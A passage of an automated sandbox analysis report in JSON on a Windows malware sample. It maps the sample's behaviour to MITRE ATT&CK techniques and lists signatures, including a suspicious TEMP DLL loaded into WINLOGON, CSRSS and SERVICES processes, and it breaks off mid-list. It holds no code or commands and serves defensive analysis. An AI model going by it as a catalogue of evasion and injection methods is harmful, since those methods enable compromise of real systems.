"attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"RegEdit_RegEdit\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for window \"Registry Editor\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for window \"Folder Options\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for window \"Local Settings\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"ExploreWClass\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"CabinetWClass\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"RebarWindow32\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"ComboBoxEx32\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"ComboBox\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"Edit\"\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500526ef875@CRYPTSP.dll\"\n \"10001100f4124775@rsaenh.dll\"\n \"10001100e0124775@rsaenh.dll\"\n \"08000900d4124775@rsaenh.dll\"\n \"0b000c00c8124775@rsaenh.dll\"\n \"0c000d00b8124775@rsaenh.dll\"\n \"0d000e00a8124775@rsaenh.dll\"\n \"0d000e0098124775@rsaenh.dll\"\n \"0b000c008c124775@rsaenh.dll\"\n \"0b000c0080124775@rsaenh.dll\"\n \"09000a0074124775@rsaenh.dll\"\n \"09000a0068124775@rsaenh.dll\"\n \"0c000d0058124775@rsaenh.dll\"\n \"0a000b004c124775@rsaenh.dll\"\n \"1000110038124775@rsaenh.dll\"\n \"0d000e0028124775@rsaenh.dll\"\n \"0a000b001c124775@rsaenh.dll\"\n \"1100120008124775@rsaenh.dll\"\n \"0b000c00fc114775@rsaenh.dll\"\n \"0c000d00ec114775@rsaenh.dll\"\n \"0e000f00dc114775@rsaenh.dll\"\n \"0e000f00cc114775@rsaenh.dll\"\n \"0e000f00bc114775@rsaenh.dll\"\n \"0e000f00ac114775@rsaenh.dll\"\n \"0e000f009c114775@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"KERNEL32\" at base 77680000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"SHELL32.DLL\" at base 76790000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"OLE32.DLL\" at base 75e50000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"USER32\" at base 773e0000\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 77680000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 76790000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 75e50000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"4k51k4.exe\" loaded module \"USER32\" at base 773e0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 77680000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76790000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 75e50000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 773e0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 75970000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75970000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 77680000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6d240000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76790000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 75e50000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 773e0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 742c0000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76790000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 75e50000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 773e0000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 77680000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75910000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71010000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 77680000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 75fb0000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75970000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75470000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75200000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 75da0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75960000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 77680000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76790000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 75e50000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74960000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 760b0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 745f0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74ed0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77680000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76260000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76650000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 773e0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 